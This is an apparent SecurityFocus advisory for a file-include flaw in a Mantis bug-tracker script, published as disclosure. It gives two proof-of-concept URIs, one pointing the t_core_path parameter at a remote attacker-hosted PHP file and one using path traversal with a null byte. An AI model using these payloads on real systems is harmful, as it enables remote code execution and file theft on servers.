Mantis Bug_sponsorship_list_view_inc.PHP File Include Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/bug_sponsorship_list_view_inc.php?
t_core_path=http://[host]/[file].php?
http://www.example.com/bug_sponsorship_list_view_inc.php?
t_core_path=../../../../../../../[file]%00


 

Privacy Statement
Copyright 2010, SecurityFocus